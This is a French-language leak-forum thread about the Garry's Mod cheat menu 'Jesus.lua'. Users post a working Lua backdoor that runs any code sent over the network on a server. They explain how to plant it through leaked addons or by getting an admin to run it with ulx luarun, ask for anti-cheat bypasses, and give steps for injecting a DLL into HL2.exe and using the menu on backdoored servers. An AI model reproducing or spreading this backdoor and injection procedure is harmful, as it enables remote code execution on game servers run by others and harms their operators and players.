• Salut Visiteur ! ✌
    Découvre nos partenaires officiels avec VeryLeak's. Des choix réfléchis, dignes de confiance pour tes avantages.

    StoryFound | REFUNDER TEAM

    StoryFound

    Rejoindre le Canal ✨ ou Plus d'information 📃

    Une question ? Rejoingnez nos différents canaux (Discord, Telegram, Revolt)

    Nos Canaux Communautaires

    Cet affichage peut se clôturer définitivement via la croix en haut à droite.

Non Vérifié Mod Menu Jesus.lua modifier

REKASH

VeryLeak's Unique Member 👑
Level 5
VeryFriend's

Torrents Stats

Messages
533
J'aime
1 899
Trophées
720
Inscrit
15 Mai 2018
Sujet Déplacé.
 

axel54654654685

Master 🏆
Level 2

Torrents Stats

Messages
5
J'aime
0
Trophées
174
Inscrit
23 Juillet 2018
Salut ! C'est quoi la commande pour ajouter une backdoor (si tu es admin) ou a donner a un admin?
 

capter

Master 🏆
Level 2

Torrents Stats

Messages
87
J'aime
4
Trophées
195
Inscrit
20 Octobre 2017
util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)
 

NoMadLEET

Nouveau 🌱
Level 1

Torrents Stats

Messages
6
J'aime
0
Trophées
1
Inscrit
11 Août 2018
c'est parce que il n'y a pas de backdoor sur les serveur que tu rejoins, pour qu'il y ai une backdoor il faut un addons leak avec la commande de la backdoor dans le fichier de l'addons ou alors il faut qu'un administrateur du serveur tape cette commande dans sa console:
ulx luarun util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)

Elle sert a quoi la commande ? Et sa va lui afficher quoi ?
 

Maxence Zakarov

l'Actif 🥉
Level 1

Torrents Stats

Messages
4
J'aime
0
Trophées
78
Inscrit
13 Juin 2018
Moyen d'en avoir un bypass CAC et SNTE ? n'importe le quelle .
 

Math.fouss

Master 🏆
Level 4

Torrents Stats

Messages
26
J'aime
30
Trophées
193
Inscrit
24 Décembre 2018
Si vous voulez d'autre mod menu j'en ai environs un trentaine :)
J'ai enlever tout les mod qui marcher pas sur le menu et j'ai modifier d'autre chose y compris le superspam Visuel

https://veryleaks.to/index.php?resources/mod-menu-jesus-lua.2045/download&version=2119
télécharger le et mettez le dans (C:\Users\Julie\Documents\external) vous devez crée le dossier external est mettre le menu dedans

pour ouvrir le menu prenez dllinjector :
http://www.mediafire.com/file/3r9gn8q5c68o09j/dllinjector.rar/file
http://www.mediafire.com/file/uf1s1nvhsyho28m/external.rar/file (a mettre aussi dans C:\Users\Julie\Documents\external)

ouvrir dllinjector faite select dll, chercher ou vous avez mis external.dll et cliquer dessus pour le sélectionner et sélectionner HL2.exe, une fois selectionner faite inject et rejoignez un serveur avec une backdoor en principe ouvrez votre console et faite:
external Jesus.lua
et ensuite taper :
Jesus pour ouvrir le menu



SI IL VOUS OUVRE UN MENU QUI DIT QUE VOUS NE POUVIEZ PAS LANCER LE FICHIER C"EST JUSTE QU"IL FAUT ALLEZ DANS LE DOSSIER Jesus.lua EST L'OUVRIR AVEC NOTPAD++, MAINTENANT VOUS ALLEZ FAIRE CTRL+F EST VOUS ALLEZ TAPER STEAM_ ENSUITE VOUS REMPLACER TOUT LES STEAMID PAR LE VOTRE EN JEU
le lien vers dllinjector is dead
 
Haut Bas